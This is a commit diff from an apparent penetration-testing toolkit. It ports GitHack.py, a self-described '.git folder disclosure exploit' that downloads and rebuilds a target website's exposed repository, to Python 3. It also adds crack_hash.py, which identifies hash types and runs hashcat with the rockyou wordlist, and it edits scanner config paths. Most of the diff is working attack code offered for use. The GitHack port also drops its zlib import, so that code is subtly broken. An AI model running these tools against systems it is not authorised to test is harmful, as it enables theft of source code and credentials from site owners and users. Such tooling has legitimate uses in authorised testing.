GitHack 2 -> 3, crack hash, requirements
This commit is contained in:
		
							parent
							
								
									09f85c0e74
								
							
						
					
					
						commit
						4c265dc683
					
				
							
								
								
									
										106
									
								
								GitHack.py
									
									
									
									
									
								
							
							
								
								
								
								
								
									
									
								
							
						
						
									
										106
									
								
								GitHack.py
									
									
									
									
									
								
							| @ -1,39 +1,26 @@ | |||||||
| #!/usr/bin/env python | #!/usr/bin/env python | ||||||
| # -*- encoding: utf-8 -*- |  | ||||||
| 
 | 
 | ||||||
| import sys | from urllib.parse import urlparse | ||||||
| import urllib2 |  | ||||||
| import os |  | ||||||
| import urlparse |  | ||||||
| import zlib |  | ||||||
| import threading | import threading | ||||||
| import Queue | import collections | ||||||
| import re | import binascii | ||||||
|  | import requests | ||||||
|  | import struct | ||||||
|  | import queue | ||||||
| import time | import time | ||||||
| import ssl | import ssl | ||||||
| 
 |  | ||||||
| #!/usr/bin/env python |  | ||||||
| # |  | ||||||
| # https://github.com/git/git/blob/master/Documentation/technical/index-format.txt |  | ||||||
| # |  | ||||||
| 
 |  | ||||||
| import binascii |  | ||||||
| import collections |  | ||||||
| import mmap |  | ||||||
| import struct |  | ||||||
| import sys | import sys | ||||||
| 
 | import os | ||||||
|  | import re | ||||||
| 
 | 
 | ||||||
| def check(boolean, message): | def check(boolean, message): | ||||||
|     if not boolean: |     if not boolean: | ||||||
|         import sys |         print("error: " + message) | ||||||
|         print "error: " + message |         exit(1) | ||||||
|         sys.exit(1) |  | ||||||
| 
 |  | ||||||
| 
 | 
 | ||||||
| def parse(filename, pretty=True): | def parse(filename, pretty=True): | ||||||
|     with open(filename, "rb") as o: |     with open(filename, "rb") as f: | ||||||
|         f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) |         # f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) | ||||||
| 
 | 
 | ||||||
|         def read(format): |         def read(format): | ||||||
|             # "All binary numbers are in network byte order." |             # "All binary numbers are in network byte order." | ||||||
| @ -137,41 +124,30 @@ def parse(filename, pretty=True): | |||||||
| 
 | 
 | ||||||
|             padlen = (8 - (entrylen % 8)) or 8 |             padlen = (8 - (entrylen % 8)) or 8 | ||||||
|             nuls = f.read(padlen) |             nuls = f.read(padlen) | ||||||
|             check(set(nuls) == set(['\x00']), "padding contained non-NUL") |             check(set(nuls) == set([0]), "padding contained non-NUL") | ||||||
| 
 | 
 | ||||||
|             yield entry |             yield entry | ||||||
| 
 | 
 | ||||||
|         f.close() |         f.close() | ||||||
| 
 | 
 | ||||||
| context = ssl._create_unverified_context() |  | ||||||
| if len(sys.argv) == 1: |  | ||||||
|     msg = """ |  | ||||||
| A `.git` folder disclosure exploit. By LiJieJie |  | ||||||
| 
 |  | ||||||
| Usage: GitHack.py http://www.target.com/.git/ |  | ||||||
| 
 |  | ||||||
| bug-report: my[at]lijiejie.com (http://www.lijiejie.com) |  | ||||||
| """ |  | ||||||
|     print msg |  | ||||||
|     sys.exit(0) |  | ||||||
| 
 |  | ||||||
| 
 |  | ||||||
| class Scanner(object): | class Scanner(object): | ||||||
|     def __init__(self): |     def __init__(self): | ||||||
|         self.base_url = sys.argv[-1] |         self.base_url = sys.argv[-1] | ||||||
|         self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_') | 
 | ||||||
|  |         self.domain = urlparse(sys.argv[-1]).netloc.replace(':', '_') | ||||||
|         if not os.path.exists(self.domain): |         if not os.path.exists(self.domain): | ||||||
|             os.mkdir(self.domain) |             os.mkdir(self.domain) | ||||||
|         print '[+] Download and parse index file ...' | 
 | ||||||
|  |         print('[+] Download and parse index file ...') | ||||||
|         data = self._request_data(sys.argv[-1] + '/index') |         data = self._request_data(sys.argv[-1] + '/index') | ||||||
|         with open('index', 'wb') as f: |         with open('%s/index' % self.domain, 'wb') as f: | ||||||
|             f.write(data) |             f.write(data) | ||||||
|         self.queue = Queue.Queue() |         self.queue = queue.Queue() | ||||||
|         for entry in parse('index'): |         for entry in parse('index'): | ||||||
|             if "sha1" in entry.keys(): |             if "sha1" in entry.keys(): | ||||||
|                 self.queue.put((entry["sha1"].strip(), entry["name"].strip())) |                 self.queue.put((entry["sha1"].strip(), entry["name"].strip())) | ||||||
|                 try: |                 try: | ||||||
|                     print entry['name'] |                     print(entry['name']) | ||||||
|                 except Exception as e: |                 except Exception as e: | ||||||
|                     pass |                     pass | ||||||
|         self.lock = threading.Lock() |         self.lock = threading.Lock() | ||||||
| @ -180,45 +156,49 @@ class Scanner(object): | |||||||
| 
 | 
 | ||||||
|     @staticmethod |     @staticmethod | ||||||
|     def _request_data(url): |     def _request_data(url): | ||||||
|         request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) |         print(url) | ||||||
|         return urllib2.urlopen(request, context=context).read() |         res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) | ||||||
|  |         if res.status_code != 200: | ||||||
|  |             raise Exception("Server returned: %d %s" % (res.status_code, res.reason)) | ||||||
|  | 
 | ||||||
|  |         return res.content | ||||||
| 
 | 
 | ||||||
|     def _print(self, msg): |     def _print(self, msg): | ||||||
|         self.lock.acquire() |         self.lock.acquire() | ||||||
|         try: |         try: | ||||||
|             print msg |             print(msg) | ||||||
|         except Exception as e: |         except Exception as e: | ||||||
|             pass |             pass | ||||||
|         self.lock.release() |         self.lock.release() | ||||||
| 
 | 
 | ||||||
|     def get_back_file(self): |     def get_back_file(self): | ||||||
|  | 
 | ||||||
|         while not self.STOP_ME: |         while not self.STOP_ME: | ||||||
|  | 
 | ||||||
|             try: |             try: | ||||||
|                 sha1, file_name = self.queue.get(timeout=0.5) |                 sha1, file_name = self.queue.get(timeout=0.5) | ||||||
|             except Exception as e: |             except Exception as e: | ||||||
|                 break |                 break | ||||||
|             for i in range(3): | 
 | ||||||
|             try: |             try: | ||||||
|                 folder = '/objects/%s/' % sha1[:2] |                 folder = '/objects/%s/' % sha1[:2] | ||||||
|                 data = self._request_data(self.base_url + folder + sha1[2:]) |                 data = self._request_data(self.base_url + folder + sha1[2:]) | ||||||
|                 try: |                 try: | ||||||
|                     data = zlib.decompress(data) |                     data = zlib.decompress(data) | ||||||
|                     except: |  | ||||||
|                         self._print('[Error] Fail to decompress %s' % file_name) |  | ||||||
|                     data = re.sub(r'blob \d+\00', '', data) |                     data = re.sub(r'blob \d+\00', '', data) | ||||||
|  |                 except: | ||||||
|  |                     # self._print('[Error] Fail to decompress %s' % file_name) | ||||||
|  |                     pass | ||||||
|  | 
 | ||||||
|                 target_dir = os.path.join(self.domain, os.path.dirname(file_name)) |                 target_dir = os.path.join(self.domain, os.path.dirname(file_name)) | ||||||
|                 if target_dir and not os.path.exists(target_dir): |                 if target_dir and not os.path.exists(target_dir): | ||||||
|                     os.makedirs(target_dir) |                     os.makedirs(target_dir) | ||||||
|                 with open(os.path.join(self.domain, file_name), 'wb') as f: |                 with open(os.path.join(self.domain, file_name), 'wb') as f: | ||||||
|                     f.write(data) |                     f.write(data) | ||||||
|                 self._print('[OK] %s' % file_name) |                 self._print('[OK] %s' % file_name) | ||||||
|                     break |  | ||||||
|                 except urllib2.HTTPError, e: |  | ||||||
|                     if str(e).find('HTTP Error 404') >= 0: |  | ||||||
|                         self._print('[File not found] %s' % file_name) |  | ||||||
|                         break |  | ||||||
|             except Exception as e: |             except Exception as e: | ||||||
|                 self._print('[Error] %s' % str(e)) |                 self._print('[Error] %s' % str(e)) | ||||||
|  | 
 | ||||||
|         self.exit_thread() |         self.exit_thread() | ||||||
| 
 | 
 | ||||||
|     def exit_thread(self): |     def exit_thread(self): | ||||||
| @ -233,12 +213,24 @@ class Scanner(object): | |||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
| if __name__ == '__main__': | if __name__ == '__main__': | ||||||
|  |     context = ssl._create_unverified_context() | ||||||
|  |     if len(sys.argv) == 1: | ||||||
|  |         msg = """ | ||||||
|  |     A `.git` folder disclosure exploit. By LiJieJie | ||||||
|  | 
 | ||||||
|  |     Usage: GitHack.py http://www.target.com/.git/ | ||||||
|  | 
 | ||||||
|  |     bug-report: my[at]lijiejie.com (http://www.lijiejie.com) | ||||||
|  |     """ | ||||||
|  |         print(msg) | ||||||
|  |         exit() | ||||||
|  | 
 | ||||||
|     s = Scanner() |     s = Scanner() | ||||||
|     s.scan() |     s.scan() | ||||||
|     try: |     try: | ||||||
|         while s.thread_count > 0: |         while s.thread_count > 0: | ||||||
|             time.sleep(0.1) |             time.sleep(0.1) | ||||||
|     except KeyboardInterrupt, e: |     except KeyboardInterrupt as e: | ||||||
|         s.STOP_ME = True |         s.STOP_ME = True | ||||||
|         time.sleep(1.0) |         time.sleep(1.0) | ||||||
|         print 'User Aborted.' |         print('User Aborted.') | ||||||
|  | |||||||
| @ -147,7 +147,7 @@ def calculate_elapsed_time(start_time): | |||||||
|     return ', '.join(elapsed_time) |     return ', '.join(elapsed_time) | ||||||
| 
 | 
 | ||||||
| port_scan_profiles_config_file = 'port-scan-profiles.toml' | port_scan_profiles_config_file = 'port-scan-profiles.toml' | ||||||
| with open(os.path.join(rootdir, 'config', port_scan_profiles_config_file), 'r') as p: | with open(os.path.join(rootdir, 'autorecon_config', port_scan_profiles_config_file), 'r') as p: | ||||||
|     try: |     try: | ||||||
|         port_scan_profiles_config = toml.load(p) |         port_scan_profiles_config = toml.load(p) | ||||||
| 
 | 
 | ||||||
| @ -157,13 +157,13 @@ with open(os.path.join(rootdir, 'config', port_scan_profiles_config_file), 'r') | |||||||
|     except toml.decoder.TomlDecodeError as e: |     except toml.decoder.TomlDecodeError as e: | ||||||
|         fail('Error: Couldn\'t parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags.') |         fail('Error: Couldn\'t parse {port_scan_profiles_config_file} config file. Check syntax and duplicate tags.') | ||||||
| 
 | 
 | ||||||
| with open(os.path.join(rootdir, 'config', 'service-scans.toml'), 'r') as c: | with open(os.path.join(rootdir, 'autorecon_config', 'service-scans.toml'), 'r') as c: | ||||||
|     try: |     try: | ||||||
|         service_scans_config = toml.load(c) |         service_scans_config = toml.load(c) | ||||||
|     except toml.decoder.TomlDecodeError as e: |     except toml.decoder.TomlDecodeError as e: | ||||||
|         fail('Error: Couldn\'t parse service-scans.toml config file. Check syntax and duplicate tags.') |         fail('Error: Couldn\'t parse service-scans.toml config file. Check syntax and duplicate tags.') | ||||||
| 
 | 
 | ||||||
| with open(os.path.join(rootdir, 'config', 'global-patterns.toml'), 'r') as p: | with open(os.path.join(rootdir, 'autorecon_config', 'global-patterns.toml'), 'r') as p: | ||||||
|     try: |     try: | ||||||
|         global_patterns = toml.load(p) |         global_patterns = toml.load(p) | ||||||
|         if 'pattern' in global_patterns: |         if 'pattern' in global_patterns: | ||||||
|  | |||||||
							
								
								
									
										192
									
								
								crack_hash.py
									
									
									
									
									
										Normal file
									
								
							
							
								
								
								
								
								
									
									
								
							
						
						
									
										192
									
								
								crack_hash.py
									
									
									
									
									
										Normal file
									
								
							| @ -0,0 +1,192 @@ | |||||||
|  | #!/usr/bin/env python | ||||||
|  | 
 | ||||||
|  | import sys | ||||||
|  | import requests | ||||||
|  | import subprocess | ||||||
|  | import enum | ||||||
|  | import re | ||||||
|  | import tempfile | ||||||
|  | import base64 | ||||||
|  | import io | ||||||
|  | from bs4 import BeautifulSoup | ||||||
|  | 
 | ||||||
|  | HEX_PATTERN = re.compile("^[a-fA-F0-9]+$") | ||||||
|  | B64_PATTERN = re.compile("^[a-zA-Z0-9+/=]+$") | ||||||
|  | B64_URL_PATTERN = re.compile("^[a-zA-Z0-9=_-]+$") | ||||||
|  | 
 | ||||||
|  | class HashType(enum.Enum): | ||||||
|  | 
 | ||||||
|  |     # MD5 | ||||||
|  |     RAW_MD4 = 900 | ||||||
|  |     RAW_MD5 = 0 | ||||||
|  |     MD5_PASS_SALT = 10 | ||||||
|  |     MD5_SALT_PASS = 20 | ||||||
|  | 
 | ||||||
|  |     # SHA1 | ||||||
|  |     RAW_SHA1 = 100 | ||||||
|  |     SHA1_PASS_SALT = 110 | ||||||
|  |     SHA1_SALT_PASS = 120 | ||||||
|  | 
 | ||||||
|  |     # SHA2 | ||||||
|  |     RAW_SHA2_224 = 1300 | ||||||
|  |     RAW_SHA2_256 = 1400 | ||||||
|  |     RAW_SHA2_384 = 10800 | ||||||
|  |     RAW_SHA2_512 = 1700 | ||||||
|  |     SHA512_PASS_SALT = 1710 | ||||||
|  |     SHA512_SALT_PASS = 1720 | ||||||
|  | 
 | ||||||
|  |     # SHA3 | ||||||
|  |     RAW_SHA3_224 = 17300 | ||||||
|  |     RAW_SHA3_256 = 17400 | ||||||
|  |     RAW_SHA3_384 = 17500 | ||||||
|  |     RAW_SHA3_512 = 17600 | ||||||
|  | 
 | ||||||
|  |     # Keccak | ||||||
|  |     RAW_KECCAK_224 = 17700 | ||||||
|  |     RAW_KECCAK_256 = 17800 | ||||||
|  |     RAW_KECCAK_384 = 17900 | ||||||
|  |     RAW_KECCAK_512 = 18000 | ||||||
|  | 
 | ||||||
|  |     # Ripe-MD | ||||||
|  |     RAW_RIPEMD_160 = 6000 | ||||||
|  | 
 | ||||||
|  |     # Crypt | ||||||
|  |     CRYPT_MD5 = 500 | ||||||
|  |     CRYPT_BLOWFISH = 3200 | ||||||
|  |     CRYPT_SHA256 = 7400 | ||||||
|  |     CRYPT_SHA512 = 1800 | ||||||
|  |     CRYPT_APACHE = 1600 | ||||||
|  | 
 | ||||||
|  | class Hash: | ||||||
|  | 
 | ||||||
|  |     def __init__(self, hash): | ||||||
|  |         self.hash = hash | ||||||
|  |         self.salt = None | ||||||
|  |         self.isSalted = False | ||||||
|  |         self.type = [] | ||||||
|  |         self.cracked = None | ||||||
|  |         self.findType() | ||||||
|  | 
 | ||||||
|  |     def findType(self): | ||||||
|  | 
 | ||||||
|  |         raw_hash = self.hash | ||||||
|  |         if raw_hash[0] == "$": | ||||||
|  |             crypt_parts = list(filter(None, raw_hash.split("$"))) | ||||||
|  |             crypt_type = crypt_parts[0] | ||||||
|  |             self.isSalted = len(crypt_parts) > 2 | ||||||
|  |             if crypt_type == "1": | ||||||
|  |                 self.type.append(HashType.CRYPT_MD5) | ||||||
|  |             elif crypt_type.startswith("2"): | ||||||
|  |                 self.type.append(HashType.CRYPT_BLOWFISH) | ||||||
|  |             elif crypt_type == "5": | ||||||
|  |                 self.type.append(HashType.CRYPT_SHA256) | ||||||
|  |             elif crypt_type == "6": | ||||||
|  |                 self.type.append(HashType.CRYPT_SHA512) | ||||||
|  |             elif crypt_type == "apr1": | ||||||
|  |                 self.type.append(HashType.CRYPT_APACHE) | ||||||
|  |         else: | ||||||
|  |             self.isSalted = ":" in raw_hash | ||||||
|  |             if self.isSalted: | ||||||
|  |                 raw_hash, self.salt = raw_hash.split(":") | ||||||
|  | 
 | ||||||
|  |         # Base64 -> hex | ||||||
|  |         try: | ||||||
|  |             if not HEX_PATTERN.match(raw_hash): | ||||||
|  | 
 | ||||||
|  |                 if B64_URL_PATTERN.match(raw_hash): | ||||||
|  |                     raw_hash = raw_hash.replace("-","+").replace("_","/") | ||||||
|  |                 if B64_PATTERN.match(raw_hash): | ||||||
|  |                     raw_hash = base64.b64decode(raw_hash.encode("UTF-8")).decode("UTF-8").hex() | ||||||
|  | 
 | ||||||
|  |                 if self.isSalted: | ||||||
|  |                     self.hash = raw_hash + ":" + self.salt | ||||||
|  |                 else: | ||||||
|  |                     self.hash = raw_hash | ||||||
|  |         except: | ||||||
|  |             pass | ||||||
|  | 
 | ||||||
|  |         if HEX_PATTERN.match(raw_hash): | ||||||
|  |             hash_len = len(raw_hash) | ||||||
|  |             if hash_len == 32: | ||||||
|  |                 if self.isSalted: | ||||||
|  |                     self.type.append(HashType.MD5_PASS_SALT) | ||||||
|  |                     self.type.append(HashType.MD5_SALT_PASS) | ||||||
|  |                 else: | ||||||
|  |                     self.type.append(HashType.RAW_MD5) | ||||||
|  |                     self.type.append(HashType.RAW_MD4) | ||||||
|  |             elif hash_len == 40: | ||||||
|  |                 if self.isSalted: | ||||||
|  |                     self.type.append(HashType.SHA1_PASS_SALT) | ||||||
|  |                     self.type.append(HashType.SHA1_SALT_PASS) | ||||||
|  |                 else: | ||||||
|  |                     self.type.append(HashType.RAW_SHA1) | ||||||
|  |                     self.type.append(HashType.RAW_MD4) | ||||||
|  |                     self.type.append(HashType.RAW_RIPEMD_160) | ||||||
|  |             elif hash_len == 96: | ||||||
|  |                 if not self.isSalted: | ||||||
|  |                     self.type.append(HashType.RAW_SHA2_384) | ||||||
|  |                     self.type.append(HashType.RAW_SHA3_384) | ||||||
|  |                     self.type.append(HashType.RAW_KECCAK_384) | ||||||
|  |             elif hash_len == 128: | ||||||
|  |                 if self.isSalted: | ||||||
|  |                     self.type.append(HashType.SHA512_PASS_SALT) | ||||||
|  |                     self.type.append(HashType.SHA512_SALT_PASS) | ||||||
|  |                 else: | ||||||
|  |                     self.type.append(HashType.RAW_SHA2_512) | ||||||
|  |                     self.type.append(HashType.RAW_SHA3_512) | ||||||
|  |                     self.type.append(HashType.RAW_KECCAK_256) | ||||||
|  | 
 | ||||||
|  |         if len(self.type) == 0: | ||||||
|  |             print("%s: Unknown hash" % self.hash) | ||||||
|  | 
 | ||||||
|  | if len(sys.argv) < 2: | ||||||
|  |     print("Usage: %s <file>" % sys.argv[0]) | ||||||
|  |     exit(1) | ||||||
|  | 
 | ||||||
|  | hashes = [Hash(x) for x in filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])] | ||||||
|  | 
 | ||||||
|  | uncracked_hashes = { } | ||||||
|  | for hash in hashes: | ||||||
|  |     if hash.type: | ||||||
|  |         for t in hash.type: | ||||||
|  |             if t not in uncracked_hashes: | ||||||
|  |                 uncracked_hashes[t] = [] | ||||||
|  |             uncracked_hashes[t].append(hash) | ||||||
|  | 
 | ||||||
|  | if len(uncracked_hashes) > 0: | ||||||
|  |     uncracked_types = list(uncracked_hashes.keys()) | ||||||
|  |     num_types = len(uncracked_types) | ||||||
|  |     if num_types > 0: | ||||||
|  |         print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:") | ||||||
|  |         print() | ||||||
|  | 
 | ||||||
|  |         i = 0 | ||||||
|  |         for t,lst in uncracked_hashes.items(): | ||||||
|  |             print("%d.\t%s:\t%d hashe(s)" % (i, str(t)[len("HashType."):], len(lst))) | ||||||
|  |             i += 1 | ||||||
|  | 
 | ||||||
|  |         # Ask user… | ||||||
|  |         selected = None | ||||||
|  |         while selected is None or selected < 0 or selected >= num_types: | ||||||
|  |             try: | ||||||
|  |                 selected = int(input("Your Choice: ").strip()) | ||||||
|  |                 if selected >= 0 and selected < num_types: | ||||||
|  |                     break | ||||||
|  |             except Exception as e: | ||||||
|  |                 if type(e) in [EOFError, KeyboardInterrupt]: | ||||||
|  |                     print() | ||||||
|  |                     exit() | ||||||
|  | 
 | ||||||
|  |             print("Invalid input") | ||||||
|  |         selected_type = uncracked_types[selected] | ||||||
|  |     else: | ||||||
|  |         selected_type = uncracked_types[0] | ||||||
|  | 
 | ||||||
|  |     fp = tempfile.NamedTemporaryFile() | ||||||
|  |     for hash in uncracked_hashes[selected_type]: | ||||||
|  |         fp.write(b"%s\n" % hash.hash.encode("UTF-8")) | ||||||
|  |     fp.flush() | ||||||
|  | 
 | ||||||
|  |     proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, "/usr/share/wordlists/rockyou.txt", "--force"]) | ||||||
|  |     proc.wait() | ||||||
|  |     fp.close() | ||||||
							
								
								
									
										6
									
								
								requirements.txt
									
									
									
									
									
										Normal file
									
								
							
							
								
								
								
								
								
									
									
								
							
						
						
									
										6
									
								
								requirements.txt
									
									
									
									
									
										Normal file
									
								
							| @ -0,0 +1,6 @@ | |||||||
|  | netifaces==0.10.9 | ||||||
|  | colorama==0.4.3 | ||||||
|  | requests==2.23.0 | ||||||
|  | toml==0.10.0 | ||||||
|  | paramiko==2.7.1 | ||||||
|  | beautifulsoup4==4.9.1 | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user